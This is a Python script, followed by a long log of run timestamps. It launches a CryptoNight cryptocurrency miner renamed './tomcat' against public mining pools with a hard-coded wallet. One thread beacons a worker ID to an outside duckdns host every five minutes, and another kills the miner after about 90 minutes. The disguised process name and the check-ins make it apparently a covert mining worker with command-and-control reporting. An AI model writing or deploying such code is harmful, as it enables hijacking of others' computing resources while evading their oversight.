import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:19:06.016293
#2018-02-17 17:06:06.588600
#2018-02-17 18:54:01.452061
#2018-02-17 20:43:06.425693
#2018-02-17 22:30:09.220022
#2018-02-18 00:13:06.105997
#2018-02-18 02:05:05.336788
#2018-02-18 03:52:05.078018
#2018-02-18 05:41:01.399898
#2018-02-18 07:33:04.400619
#2018-02-18 09:21:05.831584
#2018-02-18 11:07:04.641464
#2018-02-18 12:54:03.144989
#2018-02-18 14:40:07.827115
#2018-02-18 16:29:01.485254
#2018-02-18 18:18:07.599920
#2018-02-18 20:04:01.817228
#2018-02-18 21:50:08.601030
#2018-02-18 23:39:04.341851
#2018-02-19 01:24:07.447355
#2018-02-19 03:12:01.304767
#2018-02-19 04:57:06.859845
#2018-02-19 06:41:07.026346
#2018-02-19 08:32:05.552589
#2018-02-19 10:21:02.175508
#2018-02-19 12:09:04.458443
#2018-02-19 13:55:07.496987
#2018-02-19 15:44:06.759955
#2018-02-19 17:31:09.472407
#2018-02-19 19:19:07.854098
#2018-02-19 21:07:04.226668
#2018-02-19 22:53:08.050849
#2018-02-20 00:38:01.425847
#2018-02-20 02:26:07.596737
#2018-02-20 04:16:07.616217
#2018-02-20 05:59:01.652144
#2018-02-20 07:45:08.115077
#2018-02-20 09:32:07.044527
#2018-02-20 11:16:04.024631
#2018-02-20 13:03:09.459136
#2018-02-20 14:47:05.516993
#2018-02-20 16:34:01.672478
#2018-02-20 18:22:04.723596
#2018-02-20 20:12:08.574875
#2018-02-20 22:12:06.795490
#2018-02-20 23:55:05.494276
#2018-02-21 01:39:08.403493
#2018-02-21 03:26:06.434292
#2018-02-21 05:14:07.733830
#2018-02-21 07:03:05.794987
#2018-02-21 08:48:08.060884
#2018-02-21 10:36:02.028700
#2018-02-21 12:23:04.160361
#2018-02-21 14:11:09.455777
#2018-02-21 15:57:10.045732
#2018-02-21 17:50:16.989475
#2018-02-21 19:37:06.438999
#2018-02-21 21:24:05.538750
#2018-02-21 23:10:08.336467
#2018-02-22 00:59:05.921784
#2018-02-22 02:48:05.849262
#2018-02-22 04:33:05.583357
#2018-02-22 06:18:05.810245
#2018-02-22 08:04:05.375354
#2018-02-22 09:52:04.846568
#2018-02-22 11:37:01.956138
#2018-02-22 13:24:09.801670
#2018-02-22 15:14:05.121603
#2018-02-22 16:58:06.703280
#2018-02-22 18:46:01.187931
#2018-02-22 20:37:04.542603
#2018-02-22 22:22:07.893762
#2018-02-23 00:09:01.913722
#2018-02-23 01:57:01.395762
#2018-02-23 03:45:07.696529
#2018-02-23 05:34:05.091844
#2018-02-23 07:19:04.082677
#2018-02-23 09:23:02.146384
#2018-02-23 11:28:01.667209
#2018-02-23 13:19:01.316328
#2018-02-23 15:04:08.309347
#2018-02-23 16:53:06.386712
#2018-02-23 18:40:10.569591
#2018-02-23 20:26:04.531085
#2018-02-23 22:13:05.555243
#2018-02-23 23:59:05.549515
#2018-02-24 01:50:02.966272
#2018-02-24 03:43:01.235166
#2018-02-24 05:32:05.504544
#2018-02-24 07:18:03.917794
#2018-02-24 09:08:06.320780
#2018-02-24 10:45:09.091596
#2018-02-24 12:31:07.419815
#2018-02-24 14:08:04.743589
#2018-02-24 15:40:07.224433
#2018-02-24 17:19:06.959340
#2018-02-24 18:50:08.780081
#2018-02-24 20:23:02.127121
#2018-02-24 21:49:03.668352
#2018-02-25 00:30:07.939061
#2018-02-25 02:26:04.094113
#2018-02-25 06:16:04.353650
#2018-02-25 11:40:01.950226